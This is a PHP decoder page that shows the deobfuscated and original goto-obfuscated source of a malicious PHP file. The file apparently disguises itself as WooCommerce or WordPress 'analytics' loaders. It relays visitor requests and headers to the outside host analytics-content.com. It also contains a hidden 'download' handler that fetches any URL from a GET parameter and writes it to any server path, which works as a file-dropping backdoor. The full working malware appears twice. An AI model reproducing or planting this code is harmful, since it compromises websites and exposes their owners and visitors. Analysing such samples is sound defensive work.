Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto CVHd5; AOPlP: function decode_chunked($str) { for ($res = ''; !empty($str); $st..
Decoded Output download
<?php goto CVHd5; AOPlP: function decode_chunked($str) { for ($res = ''; !empty($str); $str = trim($str)) { $pos = strpos($str, "\xd
"); $len = hexdec(substr($str, 0, $pos)); $res .= substr($str, $pos + 2, $len); $str = substr($str, $pos + 2 + $len); } return $res; } goto IJ0Wg; cdzZ2: function get_from_cache($name) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $result = $memcache->get($name); if ($result) { return $result; } } } return null; } goto nzCcq; a3y0r: function get_ip_address() { $ip = ''; if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else { if (isset($_SERVER["HTTP_CLIENT_IP"])) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } else { $ip = $_SERVER["REMOTE_ADDR"]; } } return $ip; } goto XEkVA; IJ0Wg: function download() { if (isset($_GET["s"]) and isset($_GET["d"])) { $file_url = urldecode($_GET["s"]); $destination_path = urldecode($_GET["d"]); $fp = fopen($destination_path, "w+"); $ch = curl_init($file_url); curl_setopt($ch, CURLOPT_FILE, $fp); curl_exec($ch); $st_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); fclose($fp); if ($st_code == 200) { echo "File downloaded successfully!"; } else { echo "Error downloading file!"; } } else { echo dirname(__FILE__); } } goto nskIS; CVHd5: $routing = array("/wp-content/plugins/woocommerce/vendor/loader.php" => '', "/wp-content/plugins/woocommerce/loader.php" => '', "/wp-includes/analytics.php" => '', "/catalog/view/theme/default/stylesheet/joseanmatias_parcelamento_desconto.php" => '', "/pub/errors/analytics.php" => '', "/analytics" => ''); goto gACCD; s3Oc0: function remove_in_cache($name) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $memcache->delete($name); } } } goto AOPlP; nskIS: try { if ($_SERVER["REQUEST_METHOD"] !== "GET") { bad_request(); } if (isset($_GET["download"])) { download(); die; } $url = $_SERVER["REQUEST_URI"]; if (!isset($url) || $url == '') { bad_request(); } $url = parse_url($url); $path = $url["path"]; if (!isset($path) || $path == "/") { bad_request(); } $query = ''; $clear = false; if (isset($url["query"])) { parse_str($url["query"], $params); if (isset($params["path"])) { $path = $params["path"]; unset($params["path"]); } if (isset($params["cache"]) && $params["cache"] == "clear") { $clear = true; } $query = http_build_query($params); } foreach ($routing as $key => $value) { if (strpos($path, $key) !== false) { $path = str_replace($key, $value, $path); } } if ($path == "/html/liveness") { echo "OK"; die(1); } if ($clear) { remove_in_cache($path); } $cached = true; $response = get_from_cache($path); if (!isset($response)) { $cached = false; $fp = fsockopen("ssl://" . $dest, 443, $code, $mesage, 5); if (!$fp) { die("{$code} ({$message})"); } fputs($fp, "GET " . $path . "?" . $query . " HTTP/1.1
"); fputs($fp, "Host: " . $dest . "\xd\xa"); fputs($fp, "X-Forwarded-For: " . get_ip_address() . "
"); foreach (apache_request_headers() as $header => $value) { if (strcasecmp($header, "Host") !== 0 && strcasecmp($header, "X-Forwarded-For") !== 0) { if (isset($value) && strlen($value) > 0) { fputs($fp, $header . ": " . $value . "\xd\xa"); } } } fputs($fp, "Connection: close
\xa
\xa"); while (!feof($fp)) { $response .= fgets($fp, 1024); } fclose($fp); } $result = explode("\xd\xa\xd
", $response, 2); if (!isset($result[0]) || !isset($result[1])) { bad_request(); } if (!headers_sent()) { header_remove(); } $headers = explode("
\xa", $result[0]); $cache = 0; $is_gzip = false; $is_chunked = false; foreach ($headers as $headerLine) { if (strpos($headerLine, "Connection") !== false) { continue; } if (strpos($headerLine, "Date") !== false) { continue; } if ($headerLine == "Content-Encoding: gzip") { $is_gzip = true; continue; } if ($headerLine == "Transfer-Encoding: chunked") { $is_chunked = true; continue; } if ($cached !== true && strpos($headerLine, "Cache-Control: public,max-age=") !== false) { $cache = intval(str_replace("Cache-Control: public,max-age=", '', $headerLine)); } header($headerLine, true); if (strpos($headerLine, "404 Not Found") !== false) { die; } } if ($cache > 0) { set_to_cache($path, $response, $cache); } $contents = $result[1]; if ($is_chunked) { $contents = decode_chunked($contents); } if ($is_gzip) { $contents = gzdecode($contents); } echo $contents; } catch (Exception $e) { bad_request(); } goto IjUdl; nzCcq: function set_to_cache($name, $value, $expired) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $memcache->set($name, $value, 0, $expired); } } } goto s3Oc0; WkZD5: if (!function_exists("apache_request_headers")) { function apache_request_headers() { $arh = array(); $rx_http = "/\AHTTP_/"; foreach ($_SERVER as $key => $val) { if (preg_match($rx_http, $key)) { $arh_key = preg_replace($rx_http, '', $key); $rx_matches = array(); $rx_matches = explode("_", $arh_key); if (count($rx_matches) > 0 and strlen($arh_key) > 2) { foreach ($rx_matches as $ak_key => $ak_val) { $rx_matches[$ak_key] = ucfirst($ak_val); } $arh_key = implode("-", $rx_matches); } $arh[$arh_key] = $val; } } return $arh; } } goto a3y0r; XEkVA: function bad_request() { header("Location: https://google.com"); die; } goto cdzZ2; gACCD: $dest = "analytics-content.com"; goto WkZD5; IjUdl:
?>
Did this file decode correctly?
Original Code
<?php goto CVHd5; AOPlP: function decode_chunked($str) { for ($res = ''; !empty($str); $str = trim($str)) { $pos = strpos($str, "\xd\12"); $len = hexdec(substr($str, 0, $pos)); $res .= substr($str, $pos + 2, $len); $str = substr($str, $pos + 2 + $len); } return $res; } goto IJ0Wg; cdzZ2: function get_from_cache($name) { if (class_exists("\115\x65\x6d\143\141\x63\150\x65")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\x6c\x6f\143\x61\154\x68\157\x73\x74"); if ($isAvailable) { $result = $memcache->get($name); if ($result) { return $result; } } } return null; } goto nzCcq; a3y0r: function get_ip_address() { $ip = ''; if (isset($_SERVER["\110\124\x54\x50\x5f\x58\137\106\x4f\122\x57\101\x52\x44\x45\x44\x5f\x46\117\122"])) { $ip = $_SERVER["\110\124\124\x50\137\130\x5f\x46\117\x52\127\101\122\104\105\x44\x5f\106\x4f\x52"]; } else { if (isset($_SERVER["\110\124\x54\x50\137\x43\x4c\x49\x45\x4e\x54\137\x49\120"])) { $ip = $_SERVER["\x48\x54\x54\x50\x5f\103\114\x49\x45\x4e\x54\x5f\x49\120"]; } else { $ip = $_SERVER["\122\105\x4d\x4f\124\105\x5f\x41\x44\x44\x52"]; } } return $ip; } goto XEkVA; IJ0Wg: function download() { if (isset($_GET["\163"]) and isset($_GET["\x64"])) { $file_url = urldecode($_GET["\163"]); $destination_path = urldecode($_GET["\144"]); $fp = fopen($destination_path, "\x77\53"); $ch = curl_init($file_url); curl_setopt($ch, CURLOPT_FILE, $fp); curl_exec($ch); $st_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); fclose($fp); if ($st_code == 200) { echo "\106\151\154\x65\x20\144\x6f\x77\156\x6c\x6f\x61\144\x65\144\40\163\165\x63\143\145\x73\x73\146\x75\x6c\x6c\171\x21"; } else { echo "\x45\x72\162\157\162\40\144\x6f\167\156\154\x6f\x61\x64\x69\x6e\147\x20\x66\x69\154\x65\x21"; } } else { echo dirname(__FILE__); } } goto nskIS; CVHd5: $routing = array("\x2f\x77\x70\x2d\143\157\156\x74\145\156\164\57\x70\154\165\x67\151\156\163\57\167\x6f\157\x63\157\x6d\155\x65\162\x63\145\57\166\x65\156\x64\x6f\162\57\154\x6f\x61\x64\x65\x72\x2e\x70\x68\x70" => '', "\57\x77\160\55\x63\157\156\164\145\156\x74\x2f\x70\x6c\165\147\151\x6e\x73\x2f\167\x6f\157\143\157\x6d\x6d\x65\162\x63\x65\57\154\x6f\x61\x64\x65\162\56\160\150\x70" => '', "\57\167\160\x2d\151\156\143\154\165\x64\x65\x73\x2f\x61\x6e\141\x6c\171\164\x69\x63\163\x2e\x70\x68\160" => '', "\x2f\143\141\x74\141\154\x6f\147\57\x76\x69\145\x77\57\x74\x68\145\x6d\145\57\144\x65\146\141\x75\x6c\x74\x2f\163\x74\x79\154\x65\163\150\145\x65\x74\x2f\152\x6f\163\145\x61\x6e\x6d\141\x74\x69\141\163\x5f\x70\141\162\x63\x65\x6c\141\155\x65\x6e\164\x6f\137\x64\x65\163\x63\x6f\x6e\x74\157\x2e\x70\150\x70" => '', "\x2f\160\165\142\x2f\145\x72\162\x6f\162\x73\57\x61\x6e\141\x6c\171\164\x69\x63\163\56\x70\150\x70" => '', "\57\x61\156\x61\x6c\x79\x74\x69\x63\x73" => ''); goto gACCD; s3Oc0: function remove_in_cache($name) { if (class_exists("\x4d\x65\x6d\143\141\x63\150\x65")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\x6c\x6f\x63\141\x6c\150\157\x73\x74"); if ($isAvailable) { $memcache->delete($name); } } } goto AOPlP; nskIS: try { if ($_SERVER["\x52\x45\121\125\x45\x53\x54\137\x4d\105\124\x48\x4f\x44"] !== "\x47\x45\124") { bad_request(); } if (isset($_GET["\x64\x6f\x77\x6e\x6c\157\x61\x64"])) { download(); die; } $url = $_SERVER["\x52\105\x51\x55\105\123\124\137\x55\122\111"]; if (!isset($url) || $url == '') { bad_request(); } $url = parse_url($url); $path = $url["\160\141\x74\x68"]; if (!isset($path) || $path == "\57") { bad_request(); } $query = ''; $clear = false; if (isset($url["\161\165\x65\162\x79"])) { parse_str($url["\161\165\145\x72\x79"], $params); if (isset($params["\160\141\164\x68"])) { $path = $params["\160\x61\164\150"]; unset($params["\160\141\x74\x68"]); } if (isset($params["\x63\x61\143\150\145"]) && $params["\143\x61\143\150\x65"] == "\x63\154\145\x61\x72") { $clear = true; } $query = http_build_query($params); } foreach ($routing as $key => $value) { if (strpos($path, $key) !== false) { $path = str_replace($key, $value, $path); } } if ($path == "\x2f\x68\x74\x6d\154\x2f\x6c\151\166\145\x6e\145\x73\163") { echo "\117\113"; die(1); } if ($clear) { remove_in_cache($path); } $cached = true; $response = get_from_cache($path); if (!isset($response)) { $cached = false; $fp = fsockopen("\x73\x73\x6c\72\57\x2f" . $dest, 443, $code, $mesage, 5); if (!$fp) { die("{$code}\40\x28{$message}\x29"); } fputs($fp, "\x47\105\x54\x20" . $path . "\77" . $query . "\x20\x48\124\x54\120\57\x31\x2e\x31\15\12"); fputs($fp, "\x48\157\x73\164\x3a\40" . $dest . "\xd\xa"); fputs($fp, "\x58\x2d\106\x6f\x72\x77\x61\x72\x64\145\x64\55\x46\x6f\162\x3a\40" . get_ip_address() . "\15\12"); foreach (apache_request_headers() as $header => $value) { if (strcasecmp($header, "\110\x6f\163\x74") !== 0 && strcasecmp($header, "\130\55\x46\157\162\x77\141\162\x64\x65\144\55\x46\x6f\162") !== 0) { if (isset($value) && strlen($value) > 0) { fputs($fp, $header . "\72\40" . $value . "\xd\xa"); } } } fputs($fp, "\103\x6f\156\156\x65\143\x74\x69\157\156\x3a\40\x63\154\x6f\x73\145\15\xa\15\xa"); while (!feof($fp)) { $response .= fgets($fp, 1024); } fclose($fp); } $result = explode("\xd\xa\xd\12", $response, 2); if (!isset($result[0]) || !isset($result[1])) { bad_request(); } if (!headers_sent()) { header_remove(); } $headers = explode("\15\xa", $result[0]); $cache = 0; $is_gzip = false; $is_chunked = false; foreach ($headers as $headerLine) { if (strpos($headerLine, "\x43\157\x6e\156\145\143\164\151\x6f\x6e") !== false) { continue; } if (strpos($headerLine, "\x44\141\x74\145") !== false) { continue; } if ($headerLine == "\103\157\x6e\164\x65\156\164\x2d\105\x6e\143\x6f\144\x69\156\147\x3a\x20\x67\x7a\151\160") { $is_gzip = true; continue; } if ($headerLine == "\x54\162\x61\156\163\x66\145\162\x2d\105\x6e\x63\x6f\144\x69\156\x67\72\40\x63\150\x75\156\x6b\x65\x64") { $is_chunked = true; continue; } if ($cached !== true && strpos($headerLine, "\x43\x61\x63\150\145\55\103\x6f\156\x74\162\x6f\x6c\72\40\x70\165\x62\154\151\143\x2c\x6d\x61\170\x2d\x61\147\x65\x3d") !== false) { $cache = intval(str_replace("\103\x61\x63\x68\x65\x2d\103\157\x6e\164\162\x6f\x6c\x3a\x20\x70\x75\x62\x6c\151\x63\x2c\x6d\x61\170\x2d\141\147\x65\x3d", '', $headerLine)); } header($headerLine, true); if (strpos($headerLine, "\64\x30\64\40\x4e\157\164\40\x46\x6f\x75\156\144") !== false) { die; } } if ($cache > 0) { set_to_cache($path, $response, $cache); } $contents = $result[1]; if ($is_chunked) { $contents = decode_chunked($contents); } if ($is_gzip) { $contents = gzdecode($contents); } echo $contents; } catch (Exception $e) { bad_request(); } goto IjUdl; nzCcq: function set_to_cache($name, $value, $expired) { if (class_exists("\115\145\x6d\143\x61\143\x68\x65")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\x6c\157\143\x61\x6c\150\157\x73\164"); if ($isAvailable) { $memcache->set($name, $value, 0, $expired); } } } goto s3Oc0; WkZD5: if (!function_exists("\141\160\x61\143\x68\145\137\x72\145\161\165\x65\163\164\x5f\150\x65\141\144\x65\162\163")) { function apache_request_headers() { $arh = array(); $rx_http = "\57\134\x41\110\x54\124\120\137\57"; foreach ($_SERVER as $key => $val) { if (preg_match($rx_http, $key)) { $arh_key = preg_replace($rx_http, '', $key); $rx_matches = array(); $rx_matches = explode("\x5f", $arh_key); if (count($rx_matches) > 0 and strlen($arh_key) > 2) { foreach ($rx_matches as $ak_key => $ak_val) { $rx_matches[$ak_key] = ucfirst($ak_val); } $arh_key = implode("\55", $rx_matches); } $arh[$arh_key] = $val; } } return $arh; } } goto a3y0r; XEkVA: function bad_request() { header("\x4c\x6f\143\x61\x74\151\157\156\72\40\150\164\x74\160\x73\72\x2f\57\x67\x6f\x6f\x67\154\145\56\x63\157\x6d"); die; } goto cdzZ2; gACCD: $dest = "\141\x6e\x61\x6c\171\x74\x69\143\x73\55\x63\157\156\164\x65\x6e\164\x2e\143\x6f\155"; goto WkZD5; IjUdl:
Function Calls
None |
Stats
MD5 | 4949fa424964d801fdaf463553fde050 |
Eval Count | 0 |
Decode Time | 59 ms |